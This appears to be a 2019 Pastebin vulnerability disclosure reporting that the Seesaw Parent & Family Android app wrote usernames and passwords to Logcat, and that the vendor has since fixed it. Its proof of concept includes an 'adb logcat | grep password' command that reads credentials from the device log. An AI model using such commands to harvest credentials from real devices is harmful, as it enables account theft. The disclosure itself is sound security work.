friendlyjlee

Security Vulnerability in Seesaw Parent & Family app

Oct 7th, 2019
569
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Title: Seesaw Parent & Family app - Logging Sensitive Information
  2. # Application: Seesaw Parent & Family
  3. # Version: 6.2.5
  4. # Software Link: https://play.google.com/store/apps/details?id=seesaw.shadowpuppet.co.seesaw
  5. # Company: Seesaw
  6. # Installs:1,000,000+
  7. # Impact: hackers can get username and password of Seesaw Family, looking at the log.
  8. # Category: Mobile Apps
  9. # Tested on : Android 9
  10.  
  11. ---Description---
  12. Seesaw Family, the popular education app installed more than 1 million, stores username and password in Logcat. So, hackers can obtain the username and password of the app, simply looking at Logcat. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission.
  13.  
  14. ---Vendor feedback---
  15. After reporting, they have fixed this problem quickly and released a new version.
  16.  
  17. ---PoC---
  18. 1. Try to log in the Android app.
  19. - Opening Login UI
  20. - Enter credentials. Fake information is enough for reproducing.
  21.  
  22.  
  23. 2. Search the password in the log
  24. $ adb logcat | grep 'password'
  25.  
  26. D Retrofit: ---> HTTP POST https://app.seesaw.me/api/auth/login?classes=1&email=jaeho.lee%40rice.edu&password=MyPasswordIsHere&role=parent&_bundle=me.see-saw.android_parent&_build=1584703&_model=GOOGLE+Android+SDK+built+for+x86&_install_id=732b4c9e-dbf0-4ecb-ad31-188bf4e51901&_tz_offset=0
  27.  
  28.  
  29. --Reporter---
  30. Jaeho Lee (Jaeho.Lee@rice.edu)
  31. Rice Computer Security Lab
  32. Rice University
RAW Paste Data